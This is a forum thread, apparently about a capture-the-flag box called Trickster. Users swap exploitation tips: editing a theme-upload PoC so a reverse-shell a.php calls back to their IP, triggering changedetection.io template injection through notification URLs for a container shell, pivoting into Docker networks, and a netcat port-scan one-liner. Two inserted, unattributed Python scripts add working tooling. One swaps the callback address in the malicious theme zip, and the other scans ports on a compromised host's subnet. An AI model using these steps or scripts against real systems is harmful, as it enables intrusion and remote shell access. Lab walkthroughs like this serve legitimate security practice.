Posts: 18
Threads: 0
Joined: Aug 2024
(Sep 22, 2024, 04:35 AM)maggi Wrote: (Sep 22, 2024, 04:13 AM)Detector6 Wrote: (Sep 21, 2024, 11:30 PM)wtfduw Wrote: Sure, my pleasure.
As for root, port 5000 is exposed for docker 172.17.0.2.
It has changedetection.io installed; tried a couple of exploits but nothing. Anyone got anything?
That is a good find, nice one. netstat and ss didn't show anything as user james; how did you find the IP and port 5000?
ligolo-ng to get at the container
Then nmap the 172 subnet? I guess Chisel would work here as well.
Thanks!
Posts: 32
Threads: 0
Joined: Jul 2023
(Sep 22, 2024, 04:51 AM)mascon Wrote: Can someone explain how did you find the ip and port?
You can see docker running (like in the ps output), then you check the interface for the IP and find 172.17.0.1.
Either use nmap or ping + nc to find the IP of the container and the port.
Posts: 148
Threads: 2
Joined: Oct 2023
(Sep 22, 2024, 04:51 AM)mascon Wrote: Can someone explain how did you find the ip and port? Ping sweeping. You can see even with `ip a` or `ifconfig` that there's something off with the docker.
Linpeas and pspy64 also; you could see things related to the changedetection.io website. Then you can investigate.
Also, let's not forget the name of this box; we all got tricked, by the docker, by the freaking slicer, by the badly written POC for foothold, etc.
Then again, probably the box was changed during approval/publish/etc., since adam should be the intended path; PrusaSlicer can be run with sudo, so yeah. James > lateral to Adam > root.
It also doesn't make sense leaving the root pwd accidentally in the bash history, which also matches adam's creds, not just the host's.
And this cred should have been found from the backup zip from datastores I'd say... not the history.
But this time, the name checks out - trickster.
Posts: 124
Threads: 1
Joined: Apr 2024
Sep 22, 2024, 08:57 AM
(This post was last modified: Sep 22, 2024, 09:16 AM by jsvensson.)
Ach, I can't get a shell to docker; using notifications nothing works, even added login to exploit.
Finally got it
Posts: 10
Threads: 0
Joined: Sep 2024
(Sep 22, 2024, 08:57 AM)jsvensson Wrote: Ach i can't get shell to docker, using notifications nothing works even added login to exploit.
To get a shell on docker you need to use the correct `notification url` like `get://SERVER` (`gets://` didn't work). I think the only criterion is that the server has to be accessible; also change the Reddit URLs to something accessible on the network. After adding the watcher, update the server with a new file and that should trigger the SSTI. (If it doesn't, you can manually do it.)
Notification URL formats are found in the watcher instance tabs.
Posts: 41
Threads: 2
Joined: Sep 2023
(Sep 21, 2024, 10:35 PM)a44857437 Wrote: (Sep 21, 2024, 10:17 PM)nomx1337 Wrote: Were you able to crack adams hash?
I cracked james' hash from the database
(Sep 21, 2024, 10:32 PM)jsvensson Wrote: for POC
there are a couple of things to change:
in the zip you have a.php - change it to your IP to get a shell - but this file must be in the zip
in exploit.py - change the name of shell.php to /themes/next/a.php
in exploit.html:
all admin-dev to admin634ewutrx1jgitlooaj
and in import_theme to your IP
I had to change the call to reverse_shell.php in exploit.html to a.php as well
(or you can add the modified reverse_shell.php to the zip)
no need to modify reverse_shell.php actually, just modify a.php inside the zip
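Added example, not part of the posted PoC or of the thread: a helper that changes the callback address inside a.php without unpacking and re-zipping the theme archive by hand, so every other entry (and its name, timestamp, permissions and compression method) stays exactly as the PoC shipped it. The archive and member names are the ones the thread uses; the placeholder address must be whatever the PoC's a.php currently contains, and the IPs in the usage line are assumptions.

```python
"""Rewrite one member of a zip archive, copying every other member unchanged.

Added example for the theme-zip step discussed in the thread; it is not the
PoC's own code. Usage:
    python3 thisfile.py SRC.zip DST.zip a.php OLD_IP NEW_IP
"""
import sys
import zipfile


def rewrite_zip_member(src_path, dst_path, member, transform):
    """Copy src_path to dst_path, replacing the bytes of `member` with
    transform(original_bytes).

    Each entry is written back with its original ZipInfo, so name, date_time,
    external_attr (unix mode bits) and compress_type survive; only the CRC
    and sizes of the rewritten member change. Returns the new member bytes.
    Raises KeyError if `member` is not in the archive. src_path and dst_path
    must differ (the destination is truncated on open)."""
    new_data = None
    with zipfile.ZipFile(src_path) as src, zipfile.ZipFile(dst_path, "w") as dst:
        for info in src.infolist():
            data = src.read(info)
            if info.filename == member:
                data = transform(data)
                new_data = data
            dst.writestr(info, data)
    if new_data is None:
        raise KeyError(member)
    return new_data


def set_callback(src_path, dst_path, member, old_host, new_host):
    """Swap the reverse-shell callback address inside one archive member.

    Refuses to write an archive in which the placeholder was not found, so a
    typo in old_host does not silently produce an unchanged a.php."""
    old, new = old_host.encode(), new_host.encode()

    def swap(data):
        if old not in data:
            raise ValueError(f"{old_host!r} not found in {member}")
        return data.replace(old, new)

    return rewrite_zip_member(src_path, dst_path, member, swap)


def list_members(path):
    """Member names of an archive, in on-disk order (useful to diff before/after)."""
    with zipfile.ZipFile(path) as z:
        return z.namelist()


if __name__ == "__main__":
    if len(sys.argv) != 6:
        # Names from the thread; the two addresses are illustrative assumptions.
        print("usage: python3 thisfile.py ps_next_8_theme_malicious.zip "
              "ps_next_8_theme_mod.zip a.php 10.10.14.1 10.10.14.5")
        sys.exit(1)
    src, dst, member, old_ip, new_ip = sys.argv[1:]
    set_callback(src, dst, member, old_ip, new_ip)
    print("members:", list_members(dst))
```

Run `unzip -l` on both archives afterwards; the listing (names, sizes of untouched members, timestamps) should be identical apart from a.php, which is the easiest way to confirm nothing else moved.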
Posts: 124
Threads: 1
Joined: Apr 2024
(Sep 22, 2024, 09:14 AM)idontevensmokebro Wrote: (Sep 22, 2024, 08:57 AM)jsvensson Wrote: Ach, I can't get a shell to docker; using notifications nothing works, even added login to exploit.
To get a shell on docker you need to use the correct `notification url` like `get://SERVER` (`gets://` didn't work). I think the only criterion is that the server has to be accessible; also change the Reddit URLs to something accessible on the network. After adding the watcher, update the server with a new file and that should trigger the SSTI. (If it doesn't, you can manually do it.)
Notification URL formats are found in the watcher instance tabs.
I had to manually trigger notification and then it worked
Posts: 41
Threads: 4
Joined: Sep 2024
Guys, how did you find that port 5000 is open?
Posts: 32
Threads: 0
Joined: Jul 2023
(Sep 22, 2024, 10:28 AM)mrdot457 Wrote: guys, how did you find the port 5000 is open?
nc -zv 172.17.0.2 1-10000 2>&1 | grep -v "Connection refused"
Connection to 172.17.0.2 5000 port [tcp/*] succeeded!
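Added example, not from any post in this thread: the same check the nc loop above performs, as a python3 script you can run on the foothold host when neither nmap nor nc is available, with the host-discovery step from earlier in the thread (finding 172.17.0.2 from the 172.17.0.1 bridge address) built in. The subnet and the port 5000 hit are the values the thread mentions; the discovery port list and everything else are assumptions.

```python
"""TCP connect scanner for a Docker bridge network, for a foothold with only python3.

Added example; not the thread's own commands. A connect scan is the same test
`nc -zv host port` does: a completed TCP handshake means open.
Usage:  python3 thisfile.py [CIDR]      (default 172.17.0.0/28)
"""
import socket
import sys
from concurrent.futures import ThreadPoolExecutor
from ipaddress import ip_network

# Assumed probe set for host discovery: one hit on any of these is enough to
# mark the address live before spending a full 1-10000 sweep on it.
DISCOVERY_PORTS = (22, 80, 443, 3000, 5000, 8000, 8080, 8443)


def tcp_open(host, port, timeout=0.3):
    """True if a full TCP handshake to host:port completes within timeout.

    A refused connection (closed port) and a timeout (unused bridge address,
    for which ARP never answers) both count as closed, so the timeout is what
    bounds the sweep time on an empty subnet."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan_ports(host, ports, timeout=0.3, workers=64):
    """Sorted list of open TCP ports on one host, probed concurrently."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        hits = pool.map(lambda p: (p, tcp_open(host, p, timeout)), ports)
        return sorted(p for p, ok in hits if ok)


def sweep_subnet(cidr, ports=DISCOVERY_PORTS, timeout=0.3, workers=64):
    """{host: [open ports]} for every host in cidr answering on any of `ports`.

    On Docker's default bridge .1 is the gateway (the host you are already on)
    and containers are handed addresses from .2 upward, so the interesting
    entries start at .2."""
    found = {}
    for host in ip_network(cidr).hosts():
        hit = scan_ports(str(host), ports, timeout, workers)
        if hit:
            found[str(host)] = hit
    return found


if __name__ == "__main__":
    cidr = sys.argv[1] if len(sys.argv) > 1 else "172.17.0.0/28"
    # Discovery on a small slice of the bridge, then a full sweep of each hit,
    # the same 1-10000 range the nc loop in the thread used.
    live = sweep_subnet(cidr)
    for host in live:
        print(host, scan_ports(host, range(1, 10001)))
```

If you have ligolo-ng or chisel already up, run nmap through the tunnel from your own machine instead; this script is for the case where you are stuck with whatever interpreter the box happens to ship.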
Posts: 13
Threads: 2
Joined: Aug 2024
(Sep 21, 2024, 11:58 PM)Str4ngerX Wrote: (Sep 21, 2024, 10:32 PM)jsvensson Wrote: for POC
there are a couple of things to change:
in the zip you have a.php - change it to your IP to get a shell - but this file must be in the zip
in exploit.py - change the name of shell.php to /themes/next/a.php
in exploit.html:
all admin-dev to admin634ewutrx1jgitlooaj
and in import_theme to your IP
I'm still unable to get this working; I'm not able to GET http://shop.trickster.htb/themes/next/a.php, it says forbidden.
I have a.php, exploit.html, exploit.py and ps_next_8_theme_malicious.zip (I've added my IP to a.php inside the zip).
I've made the right modifications but still nothing; I can't GET that a.php. I'm receiving GET requests at my hosted Python web server and it's GETting that zip file successfully.
Any help please?